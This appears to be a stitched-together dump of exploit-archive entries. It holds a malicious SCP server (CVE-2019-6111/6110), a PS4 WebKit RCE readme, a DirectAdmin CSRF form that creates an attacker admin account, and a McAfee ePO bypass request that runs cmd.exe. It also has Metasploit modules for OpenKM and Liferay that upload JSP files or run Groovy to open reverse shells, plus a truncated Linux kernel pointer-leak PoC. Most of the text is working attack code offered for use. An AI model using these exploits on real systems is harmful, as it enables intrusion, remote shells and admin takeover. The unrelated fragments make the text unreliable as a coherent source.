b'C4FJgwHxKSEwEzTskrQITtj1gYIurAhWUfsDbWIFyXlRwDc8okeZkCzNyjlMmcT4wxA39d'
b'zp8OsJDJsGV/wV3I0JwJLNXKlOxJAs5Z7WwqmUZMPZmzqupttkhPRd4ovE8jE0gNyQ5skM'
b'uVy4jk4BljnYwCQ2CUs53KtnKEYkucQJIEyoGud5wYXQUuXvimAYJMJyLlqkyQHlsK6XLz'
b'I6Q6m4WKYmOzjRxEhtXWBA1qrvmBVRgGGIoT1dIRKSN+yeaJQQKuNEEadONJjkcdI2iFC4'
b'Hs55bGI12K2rn1fuN1P4/DWtuwHQYdb+0Vunt5DDpS3+0MLaN7FF73II+PK9OungPEnZrc'
b'dIyWSE9DHbnVVP4hnF2B79CqV8nTxoWmlomuzjl664HiLbZSdrtEOdIYVqBaTeKdWNccJS'
b'J+NlZGQJZ7isJK0gs27N63dPn+oefjYU/DMGy2p7en4+7w+nJ8OG0eD/vwC6VpDqYpCwAA'
))
class ScpServer(paramiko.ServerInterface):
def __init__(self):
self.event = threading.Event()
def check_auth_password(self, username, password):
logging.info('Authenticated with %s:%s', username, password)
return paramiko.AUTH_SUCCESSFUL
def check_channel_request(self, kind, chanid):
logging.info('Opened session channel %d', chanid)
if kind == "session":
return paramiko.OPEN_SUCCEEDED
return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
def check_channel_exec_request(self, channel, command):
command = command.decode('ascii')
logging.info('Approving exec request: %s', command)
parts = command.split(' ')
# Make sure that this is a request to get a file:
assert parts[0] == 'scp'
assert '-f' in parts
file = parts[-1]
# Send file from a new thread.
threading.Thread(target=self.send_file, args=(channel, file)).start()
return True
def send_file(self, channel, file):
'''
The meat of the exploit:
1. Send the requested file.
2. Send another file (exploit.txt) that was not requested.
3. Print ANSI escape sequences to stderr to hide the transfer of
exploit.txt.
'''
def wait_ok():
assert channel.recv(1024) == b'\x00'
def send_ok():
channel.sendall(b'\x00')
wait_ok()
logging.info('Sending requested file "%s" to channel %d', file,
channel.get_id())
command = 'C0664 {} {}\n'.format(len(dummy), file).encode('ascii')
channel.sendall(command)
wait_ok()
channel.sendall(dummy)
send_ok()
wait_ok()
# This is CVE-2019-6111: whatever file the client requested, we send
# them 'exploit.txt' instead.
logging.info('Sending malicious file "exploit.txt" to channel %d',
channel.get_id())
command = 'C0664 {} exploit.txt\n'.format(len(payload)).encode('ascii')
channel.sendall(command)
wait_ok()
channel.sendall(payload)
send_ok()
wait_ok()
# This is CVE-2019-6110: the client will display the text that we send
# to stderr, even if it contains ANSI escape sequences. We can send
# ANSI codes that clear the current line to hide the fact that a second
# file was transmitted..
logging.info('Covering our tracks by sending ANSI escape sequence')
channel.sendall_stderr("\x1b[1A".encode('ascii'))
channel.close()
def main():
logging.info('Creating a temporary RSA host key...')
host_key = paramiko.rsakey.RSAKey.generate(1024)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('localhost', 2222))
sock.listen(0)
logging.info('Listening on port 2222...')
while True:
client, addr = sock.accept()
logging.info('Received connection from %s:%s', *addr)
transport = paramiko.Transport(client)
transport.add_server_key(host_key)
server = ScpServer()
transport.start_server(server=server)
if __name__ == '__main__':
main()
PS4 6.20 WebKit Code Execution PoC
==============
This repo contains a proof-of-concept (PoC) RCE exploit targeting the PlayStation 4 on firmware 6.20 leveraging CVE-2018-4441. The exploit first establishes an arbitrary read/write primitive as well as an arbitrary object address leak in `wkexploit.js`. It will then setup a framework to run ROP chains in `index.html` and by default will provide two hyperlinks to run test ROP chains - one for running the `sys_getpid()` syscall, and the other for running the `sys_getuid()` syscall to get the PID and user ID of the process respectively.
Each file contains a comment at the top giving a brief explanation of what the file contains and how the exploit works. Credit for the bug discovery is to lokihardt from Google Project Zero (p0). The bug report can be found [here](https://bugs.chromium.org/p/project-zero/issues/detail?id=1685&desc=2).
Note: It's been patched in the 6.50 firmware update.
Files
==============
Files in order by name alphabetically;
* `index.html` - Contains post-exploit code, going from arb. R/W -> code execution.
* `rop.js` - Contains a framework for ROP chains.
* `syscalls.js` - Contains an (incomplete) list of system calls to use for post-exploit stuff.
* `wkexploit.js` - Contains the heart of the WebKit exploit.
Notes
==============
* This vulnerability was patched in 6.50 firmware!
* This only gives you code execution in **userland**. This is **not** a jailbreak nor a kernel exploit, it is only the first half.
* This exploit targets firmware 6.20. It should work on lower firmwares however the gadgets will need to be ported, and the `p.launchchain()` method for code execution may need to be swapped out.
* In my tests the exploit as-is is pretty stable, but it can become less stable if you add a lot of objects and such into the exploit. This is part of the reason why `syscalls.js` contains only a small number of system calls.
Usage
==============
Setup a web-server hosting these files on localhost using xampp or any other program of your choosing. Additionally, you could host it on a server. You can access it on the PS4 by either;
1) Fake DNS spoofing to redirect the manual page to the exploit page, or
2) Using the web browser to navigate to the exploit page (not always possible).
Vulnerability Credit
==============
I wrote the exploit however I did not find the vulnerability, as mentioned above the bug (CVE-2018-4441) was found by lokihardt from Google Project Zero (p0) and was disclosed via the Chromium public bug tracker.
Resources
==============
[Chromium Bug Report](https://bugs.chromium.org/p/project-zero/issues/detail?id=1685&desc=2) - The vulnerability.
[Phrack: Attacking JavaScript Engines by saelo](http://www.phrack.org/papers/attacking_javascript_engines.html) - A life saver. Exploiting this would have been about 1500x more difficult without this divine paper.
Thanks
==============
lokihardt - The vulnerability
st4rk - Help with the exploit
qwertyoruiop - WebKit School
saelo - Phrack paper
Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46522.zip
# Exploit title: DirectAdmin v1.55 - CSRF via CMD_ACCOUNT_ADMIN Admin Panel
# Date: 03/03/2019
# Exploit Author: ManhNho
# Vendor Homepage: https://www.directadmin.com/
# Software Link: https://www.directadmin.com/
# Demo Link: https://www.directadmin.com:2222/CMD_ACCOUNT_ADMIN
# Version: 1.55
# CVE: CVE-2019-9625
# Tested on: Windows 10 / Kali Linux
# Category: Webapps
#1. Description
-----------------------------------------------------
DirectAdmin v 1.55 have CSRF via CMD_ACCOUNT_ADMIN Admin Panel lead to
create new admin account
#2. PoC
-----------------------------------------------------
a) Send below crafted request to logged in user who is having admin
Administrator level access
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://server:2222/CMD_ACCOUNT_ADMIN" method="POST">
<input type="hidden" name="fakeusernameremembered" value="" />
<input type="hidden" name="fakepasswordremembered" value="" />
<input type="hidden" name="action" value="create" />
<input type="hidden" name="username" value="attacker" />
<input type="hidden" name="email" value="attacker@mail.com" />
<input type="hidden" name="passwd" value="123456" />
<input type="hidden" name="passwd2" value="123456" />
<input type="hidden" name="notify" value="yes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
b) Once the logged in user opens the URL the form will get submitted
with active session of administrator and action get performed
successfully.
#3. References
-----------------------------------------------------
https://github.com/ManhNho/CVEs/blob/master/New-Requests/DirectAdmin-CSRF
https://nvd.nist.gov/vuln/detail/CVE-2019-9625
# Exploit Title: McAfee ePO 5.9.1 Registered Executable Local Access Bypass
# Date: 2019-03-07
# Exploit Author: @leonjza
# Vendor Homepage: https://www.mcafee.com/
# Software Link: https://www.mcafee.com/enterprise/en-us/products/epolicy-orchestrator.html
# Version: ePO v5.9.1
# Tested on: Windows Server 2012
# CVE : cve-2018-6671
GIST LINK: https://gist.github.com/leonjza/17eb8ed9cba0ea1d2c70b82782c6d949
# CVE-2018-6671 McAfee ePO 5.9.1 Registered Executable Local Access Bypass
# Specifying an X-Forwarded-For header bypasses the local only check
# https://kc.mcafee.com/corporate/index?page=content&id=SB10240
# https://nvd.nist.gov/vuln/detail/CVE-2018-6671
#
# 2019 @leonjza
#
# Tested on ePO v5.9.1, missing hotfix EPO5xHF1229850
POST /Notifications/testRegExe.do HTTP/1.1
Host: 192.168.1.26:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0)
Gecko/20100101 Firefox/66.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.26:8443/Notifications/addRegExecutable.do?orion.user.security.token=Bp5pZJOQll2vryhC
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 284
DNT: 1
Connection: close
Cookie: JSESSIONID=645BCB1CE5B7DBE1B9EDC7BB9F2F7349.route1;
orion.login.language="language:en&country:";
orion.content.size="width:1384&height:699";
JSESSIONIDSSO=4D970A5F2DBF48309F796DF38B80FC15
X-Forwarded-For: 127.0.0.1
orion.user.security.token=Bp5pZJOQll2vryhC&orion.user.security.token=Bp5pZJOQll2vryhC&executableName=CVE-2018-6671%20PoC&executablePath=c:\windows\system32\cmd.exe&userName=&pass=&passConfirm=&testExeArgs=/c
whoami > c:\CVE-2018-6671.txt&testExeTime=60000&objectId=0&ajaxMode=standard
--
L.
:wq!
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenKM Document Management < 6.3.7 - (Authenticated) Remote Command Execution',
'Description' => %q{
Versions of the OpenKM Document Management < 6.3.7 allows upload a malicious
JSP file into the "/okm:root" directories and move that file to the home directory of the site.
This vulnerability is carried out by interfering to the "Filesystem path" control in the admin's "Export" field.
As a result, attackers can gain remote code execution through the application server with root privilege.
This module allows the execution of remote commands on the server by creating a malicious JSP file.
Module has been tested successfully with OpenKM DM between 6.3.2 and 6.3.7 on Debian 4.9.18-1kali1 system.
There is also the possibility of working in lower versions.
},
'Author' => [ 'AkkuS <Özkan Mustafa Akkuş>' ], # Vulnerability Discovery, PoC & Msf Module
'References' =>
[
['URL', 'https://pentest.com.tr/exploits/OpenKM-DM-6-3-7-Remote-Command-Execution-Metasploit.html']
],
'DisclosureDate' => "March 09 2019",
'License' => MSF_LICENSE,
'Platform' => %w{ linux win },
'Targets' =>
[
[ 'Automatic',
{
'Arch' => ARCH_JAVA,
'Platform' => 'linux'
}
],
[ 'Java Windows',
{
'Arch' => ARCH_JAVA,
'Platform' => 'win'
}
],
[ 'Java Linux',
{
'Arch' => ARCH_JAVA,
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => { 'PAYLOAD' => 'java/jsp_shell_reverse_tcp' }))
register_options(
[
Opt::RPORT(8080),
OptBool.new('SSL', [true, 'Use SSL', false]),
OptString.new('TARGETURI', [true, 'The base path to OpenKM', '/']),
OptString.new('USERNAME', [true, 'User to login with', 'okmAdmin']),
OptString.new('PASSWORD', [true, 'Password to login with', 'admin']),
], self.class)
end
##
# Request to Login
##
def login
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, "/OpenKM/j_spring_security_check"),
'vars_post' => {
"j_username" => datastore['USERNAME'],
"j_password" => datastore['PASSWORD'],
"submit" => "Login"
}
})
if res and res.code == 302 and res.headers['Location'] =~ /error/
fail_with(Failure::NoAccess, "Failed to login!")
else
print_good("Login successful.")
end
return res
end
##
# Returns the SSL, Host and Port as a string
##
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
##
# Vulnerablity Check
##
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri, "/OpenKM/admin/home.jsp"),
'headers' =>
{
'Cookie' => login.get_cookies,
}
})
version = res.body.split('Version: ')[1].split('</td>')[0]
print_status("Version: #{version}")
if res and res.code == 200 and res.body =~ /Version: 6./ or res.body =~ /Version: 5./
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
return res
end
def exploit
get_cookie = login.get_cookies
cookie = get_cookie
print_status("Cookie: #{cookie}")
##
# Read to X-GWT-Permutation string
##
print_status("Attempting to read X-GWT-Permutation...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri, "/OpenKM/frontend/frontend.nocache.js"),
'headers' =>
{
'Cookie' => cookie,
}
})
cache = res.body.split('Wb=')[1].split("'")[1]
print_good("X-GWT-Permutation: #{cache}")
##
# Create directory for payload
##
print_status("Attempting to create directory for payload...")
dfile = "#{rand_text_alphanumeric(rand(5) + 5)}akkus"
string = Rex::Text.rand_text_alphanumeric(10)
data = "7|0|7|#{peer}/OpenKM/frontend/|"
data << "#{cache}"
data << "|com.openkm.frontend.client.service.OKMFolderService|create|java.lang.String/"
data << "#{string}"
data << "|#{dfile}|/okm:root|1|2|3|4|2|5|5|6|7|"
res = send_request_cgi({
'method' => 'POST',
'data' => data,
'uri' => normalize_uri(target_uri, "/OpenKM/frontend/Folder"),
'headers' =>
{
'Content-Type' => 'text/x-gwt-rpc; charset=utf-8',
'X-GWT-Permutation' => cache,
'X-GWT-Module-Base' => '#{peer}/OpenKM/frontend/',
'Referer' => '#{peer}/OpenKM/frontend/index.jsp',
'Cookie' => cookie,
}
})
if res and res.code == 200 and res.body =~ /akkus/
print_good("#{dfile} directory successfully created!")
else
print_error("Directory could not be created!")
return res
end
##
# Upload JSP payload
##
pfile = "#{rand_text_alphanumeric(rand(5) + 5)}akkus.jsp"
boundary = Rex::Text.rand_text_alphanumeric(29)
data = "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n/okm:root/#{dfile}\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\n0\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"rename\"\r\n\r\n\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"comment\"\r\n\r\n\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"mails\"\r\n\r\n\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"users\"\r\n\r\n\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"roles\"\r\n\r\n\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"message\"\r\n\r\n\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"increaseVersion\"\r\n\r\n0\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"uploadFormElement\"; filename=\"#{pfile}\""
data << "\r\nContent-Type: application/octet-stream\r\n\r\n"
data << payload.encoded
data << "\n\r\n-----------------------------{boundary}--\r\n"
print_status("Attempting to upload JSP Payload...")
res = send_request_cgi({
'method' => 'POST',
'data' => data,
'uri' => normalize_uri(target_uri, "/OpenKM/frontend/FileUpload"),
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}',
'Referer' => '#{peer}/OpenKM/frontend/index.jsp',
'Cookie' => cookie,
}
})
if res and res.code == 200 and res.body =~ /akkus.jsp/
print_good("#{pfile} payload uploaded successfully!")
else
print_error("JSP Payload upload failed!")
end
##
# Read Tomcat web directory path
##
print_status("Attempting to read Tomcat web directory path...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri, "/OpenKM/admin/system_properties.jsp"),
'headers' =>
{
'Cookie' => cookie,
}
})
dir = res.body.split('catalina.base')[1].split('<td>')[1].split(' ')[0]
path = "#{dir}/webapps/OpenKM"
print_good("Web directory path => #{path}")
##
# Move the payload file to the site's home directory
##
print_status("Attempting to move payload file to the site's home directory...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri, "/OpenKM/admin/repository_export.jsp?repoPath=%2Fokm%3Aroot%2F#{dfile}&fsPath=" + URI.encode(path, /\W/)),
'headers' =>
{
'Cookie' => cookie,
}
})
if res and res.code == 200 and res.body =~ /akkus/
print_good("JSP Payload was moved successfully!")
print_status("=> #{path}/#{pfile} ")
else
print_error("JSP Payload upload failed!")
end
##
# Execute the Payload
##
print_status("Attempting to execute the #{pfile} payload...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri, "/OpenKM/#{pfile}"),
'headers' =>
{
'Cookie' => cookie,
}
})
if res and res.code == 200
print_good("Payload executed successfully!")
else
fail_with(Failure::PayloadFailed, "Failed to execute the payload!")
end
end
end
##
# End
##
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Liferay CE Portal Tomcat < 7.1.2 ga3 - Groovy-Console Remote Command Execution',
'Description' => %q{
This module uses the Liferay CE Portal Groovy script console to execute
OS commands. The Groovy script can execute commands on the system via a [command].execute() call.
Valid credentials for an application administrator user account are required
This module has been tested successfully with Liferay CE Portal Tomcat 7.1.2 ga3 on Debian 4.9.18-1kali1 system.
},
'Author' =>
[
'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://pentest.com.tr/exploits/Liferay-CE-Portal-Tomcat-7-1-2-ga3-Groovy-Console-Remote-Command-Execution-Metasploit.html' ],
],
'Privileged' => false,
'Platform' => [ 'unix' ],
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'reverse perl ruby python',
}
},
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Liferay CE Portal Tomcat < 7.1.2 ga3', { }]
],
'DisclosureDate' => 'March 08, 2019',
'DefaultTarget' => 0,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' }))
register_options(
[
Opt::RPORT(8080),
OptString.new('USERNAME', [ true, 'The username to authenticate as' ]),
OptString.new('PASSWORD', [ true, 'The password for the specified username', ]),
OptString.new('PATH', [ true, 'The URI path of the portal', '/' ]),
], self.class)
end
##
# Version and Vulnerability Check
##
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['PATH'] + 'web/guest/home'
})
version = res.headers['Liferay-Portal']
print_status("Target: #{version}")
if res and res.code == 200 and version =~ /Portal 7./ or version =~ /Portal 6./
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
return res
end
##
# Returns the SSL, Host and Port as a string
##
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
def exploit
##
# Login and cookie information gathering
##
print_status('Attempting to login with specified user...')
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['PATH'] + 'web/guest/home'
})
authtoken = res.body.split('Liferay.authToken=')[1].split(';')[0].split('Liferay.authToken=')[0].split('"')[1]
print_status("Liferay AuthToken = #{authtoken}")
sessionid = 'JSESSIONID=' << res.headers['set-cookie'].split('JSESSIONID=')[1].split('; ')[0]
cookie = "#{sessionid}; COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US"
print_status("#{sessionid}")
boundary = Rex::Text.rand_text_alphanumeric(29)
data = "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_formDate\"\r\n\r\n"
data << ""
data << "\r\n-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_saveLastPath\"\r\n\r\nfalse\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_redirect\"\r\n\r\n\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_doActionAfterLogin\"\r\n\r\nfalse\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_login\"\r\n\r\n"
data << "#{datastore['USERNAME']}"
data << "\r\n-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_password\"\r\n\r\n"
data << "#{datastore['PASSWORD']}"
data << "\r\n-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_checkboxNames\"\r\n\r\nrememberMe\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"p_auth\"\r\n\r\n"
data << "#{authtoken}"
data << "\r\n-----------------------------{boundary}--\r\n"
res = send_request_cgi({
'method' => 'POST',
'uri' => datastore['PATH'] + 'web/guest/home?p_p_id=com_liferay_login_web_portlet_LoginPortlet&p_p_lifecycle=1&p_p_state=exclusive&p_p_mode=view&_com_liferay_login_web_portlet_LoginPortlet_javax.portlet.action=%2Flogin%2Flogin&_com_liferay_login_web_portlet_LoginPortlet_mvcRenderCommandName=%2Flogin%2Flogin',
'data' => data,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}',
},
'cookie' => cookie
})
if res.code == 302
print_good('User authentication was successful.')
else
print_error('Something went wrong! Login failed.')
end
cookie1 = ''
for cookie1_i in [ 'JSESSIONID=', 'COMPANY_ID=', 'ID=' ]
cookie1 << cookie1_i + res.headers['set-cookie'].split(cookie1_i)[1].split('; ')[0] + '; '
end
cookies0 = "#{cookie1} COOKIE_SUPPORT=true;"
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['PATH'] + 'c',
'cookie' => cookies0
})
##
# Completion of the cookie information
##
cookie2 = ''
for cookie2_i in [ 'GUEST_LANGUAGE_ID=', 'Max-Age=', 'Expires=', 'Path=' ]
cookie2 << cookie2_i + res.headers['set-cookie'].split(cookie2_i)[1].split('; ')[0] + '; '
end
cookies = "#{cookie1} #{cookie2} COOKIE_SUPPORT=true;"
if cookies =~ /ID=/
print_good("Cookies information has been verified.")
else
print_error("Cookies information could not be verified!")
exit 0
end
##
# Request to Groovy script authtoken
##
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['PATH'] + 'group/control_panel/manage?p_p_id=com_liferay_server_admin_web_portlet_ServerAdminPortlet&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_com_liferay_server_admin_web_portlet_ServerAdminPortlet_mvcRenderCommandName=%2Fserver_admin%2Fview&_com_liferay_server_admin_web_portlet_ServerAdminPortlet_tabs1=script',
'headers' =>
{
'Referer' => '#{peer}/group/control_panel/manage?p_p_id=com_liferay_server_admin_web_portlet_ServerAdminPortlet&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_com_liferay_server_admin_web_portlet_ServerAdminPortlet_mvcRenderCommandName=%2Fserver_admin%2Fview&_com_liferay_server_admin_web_portlet_ServerAdminPortlet_tabs1=script',
},
'cookie' => cookies
})
##
# Calling authtoken to Groovy script
##
authtoken2 = res.body.split('Liferay.authToken=')[1].split(';')[0].split('Liferay.authToken=')[0].split('"')[1]
print_status("Liferay AuthToken to Shell = #{authtoken2}")
##
# Payload Separation **cmd/unix/reverse|reverse_ruby|reverse_python|reverse_perl**
##
if payload.encoded =~ /sh/
cmd = payload.encoded.split('sh -c')[1].split("'")[1]
pay = "'sh', '-c', '#{cmd}'"
print_good("Reverse payload was prepared")
elsif payload.encoded =~ /perl/
cmd = payload.encoded.split('perl -MIO -e')[1].split("'")[1]
pay = "'perl', '-MIO', '-e', '#{cmd}'"
print_good("Reverse Perl payload was prepared")
elsif payload.encoded =~ /python/
cmd = payload.encoded.split('python -c "exec(')[1].split(".decode('base64'))\"")[0].split("'")[1]
pay = "'python', '-c', 'exec(\"#{cmd}\".decode(\"base64\"))'"
print_good("Reverse Python payload was prepared")
elsif payload.encoded =~ /ruby/
cmd = payload.encoded.split('ruby -rsocket -e ')[1].split("'")[1]
pay = "'ruby', '-rsocket', '-e', '#{cmd}'"
print_good("Reverse Ruby payload was prepared")
else
print_error("! Please choose payload one of cmd/unix/reverse|reverse_ruby|reverse_python|reverse_perl ")
exit 0
end
##
# Post Data to run Payload
##
cmdata = "-----------------------------{boundary}"
cmdata << "\r\nContent-Disposition: form-data; name=\"_com_liferay_server_admin_web_portlet_ServerAdminPortlet_formDate\"\r\n\r\n"
cmdata << ""
cmdata << "\r\n-----------------------------{boundary}"
cmdata << "\r\nContent-Disposition: form-data; name=\"_com_liferay_server_admin_web_portlet_ServerAdminPortlet_tabs1\"\r\n\r\n"
cmdata << "script\r\n-----------------------------{boundary}"
cmdata << "\r\nContent-Disposition: form-data; name=\"_com_liferay_server_admin_web_portlet_ServerAdminPortlet_redirect\"\r\n\r\n"
cmdata << "#{peer}/group/control_panel/manage?p_p_id="
cmdata << "com_liferay_server_admin_web_portlet_ServerAdminPortlet&p_p_lifecycle="
cmdata << "0&p_p_state=maximized&p_p_mode=view&_com_liferay_server_admin_web_portlet_"
cmdata << "ServerAdminPortlet_mvcRenderCommandName=%2Fserver_admin%2Fview&_com_liferay_"
cmdata << "server_admin_web_portlet_ServerAdminPortlet_cur=""0&_com_liferay_server_"
cmdata << "admin_web_portlet_ServerAdminPortlet_tabs1=script"
cmdata << "\r\n-----------------------------{boundary}"
cmdata << "\r\nContent-Disposition: form-data; name=\"_com_liferay_server_admin_web_portlet_ServerAdminPortlet_language\"\r\n\r\n"
cmdata << "groovy"
cmdata << "\r\n-----------------------------{boundary}"
cmdata << "\r\nContent-Disposition: form-data; name=\"_com_liferay_server_admin_web_portlet_ServerAdminPortlet_script\"\r\n\r\n"
cmdata << "def cmd = [#{pay}]"
cmdata << "\r\ncmd.execute()"
cmdata << "\r\n-----------------------------{boundary}"
cmdata << "\r\nContent-Disposition: form-data; name=\"_com_liferay_server_admin_web_portlet_ServerAdminPortlet_cmd\"\r\n\r\n"
cmdata << "runScript"
cmdata << "\r\n-----------------------------{boundary}"
cmdata << "\r\nContent-Disposition: form-data; name=\"p_auth\"\r\n\r\n"
cmdata << "#{authtoken2}"
cmdata << "\r\n-----------------------------{boundary}--\r\n"
##
# Request to get reverse shell
##
print_status("Attempting to execute the payload...")
res = send_request_cgi({
'method' => 'POST',
'uri' => datastore['PATH'] + 'group/control_panel/manage?p_p_id=com_liferay_server_admin_web_portlet_ServerAdminPortlet&p_p_lifecycle=1&p_p_state=maximized&p_p_mode=view&_com_liferay_server_admin_web_portlet_ServerAdminPortlet_javax.portlet.action=%2Fserver_admin%2Fedit_server',
'data' => cmdata,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}',
'Referer' => '#{peer}/group/control_panel/manage?p_p_id=com_liferay_server_admin_web_portlet_ServerAdminPortlet&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_com_liferay_server_admin_web_portlet_ServerAdminPortlet_mvcRenderCommandName=%2Fserver_admin%2Fview&_com_liferay_server_admin_web_portlet_ServerAdminPortlet_tabs1=script',
},
'cookie' => cookies
})
if res.code == 302
print_good('Payload was successfully executed.')
else
print_error('Something went wrong!')
end
end
end
##
# End
##
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <asm/unistd_64.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sound/asound.h>
# Exploit Title: Linux Kernel 4.4 (Ubuntu 16.04) - Leak kernel pointer in snd_timer_user_ccallback()
# Google Dork: -
# Date: 2019-03-11
# Exploit Author: wally0813
# Vendor Homepage: -
# Software Link: -
# Version: Linux Kernel 4.4 (Ubuntu 16.04)
# Tested on: ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
# CVE: CVE-2016-4578
# Category: Local
/*
* [ Briefs ]
* - If snd_timer_user_ccallback() doesn't initialize snd_timer_tread.event and snd_timer_tread.val, they are leaked by snd_timer_user_read()
* - This is local exploit against the CVE-2016-4578.
*
* [ Tested version ]
* - 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
*
* [ Prerequisites ]
* -
*
* [ Goal ]
* - Leak 4 bytes kernel pointer address using snd_timer_user_ccallback()
*
* [ Run exploit ]
* - $ gcc -o poc poc.c
* - $ sudo ./poc
* leak_value(event) : ffff8800
* leak_value(val) : ffffffff
*
* [ Contact ]
* - soyeoni0813@gmail.com
*/
int fd;
void leak(){
struct snd_timer_tread td;
struct snd_timer_select st;
struct snd_timer_params ps;
int r;
unsigned int leak_value_e, leak_value_v;
int tread;
memset(&td,0,sizeof(td));
memset(&st,0,sizeof(st));
memset(&ps,0,sizeof(ps));
// set tread
tread = 1;
ps.filter |= 1<<SNDRV_TIMER_EVENT_START;
ps.ticks = 1000 * 1000;
r = ioctl(fd, SNDRV_TIMER_IOCTL_TREAD, &tread);
if (r) {
printf("SNDRV_TIMER_IOCTL_TREAD error : %d, %s\n", errno, strerror(errno));
return;
}
// vuln trigger
st.id.dev_class = SNDRV_TIMER_CLASS_GLOBAL;
st.id.dev_sclass = SNDRV_TIMER_SCLASS_APPLICATION;
r = ioctl(fd, SNDRV_TIMER_IOCTL_SELECT, &st);
if (r) {
printf("SNDRV_TIMER_IOCTL_SELECT error : %d, %s\n", errno, strerror(errno));
return;
}
r = ioctl(fd, SNDRV_TIMER_IOCTL_PARAMS, &ps);
if (r) {
printf("SNDRV_TIMER_IOCTL_PARAMS error : %d, %s\n", errno, strerror(errno));
return;
}
r = ioctl(fd, SNDRV_TIMER_IOCTL_START);
if (r) {
printf("SNDRV_TIMER_IOCTL_START error : %d, %s\n", errno, strerror(errno));
return;
}
// get leak
r = read(fd, &td, sizeof(td));
leak_value_e = *((unsigned long *)(&td.event+1));
printf("leak_value(event) : %lx\n", leak_value_e);
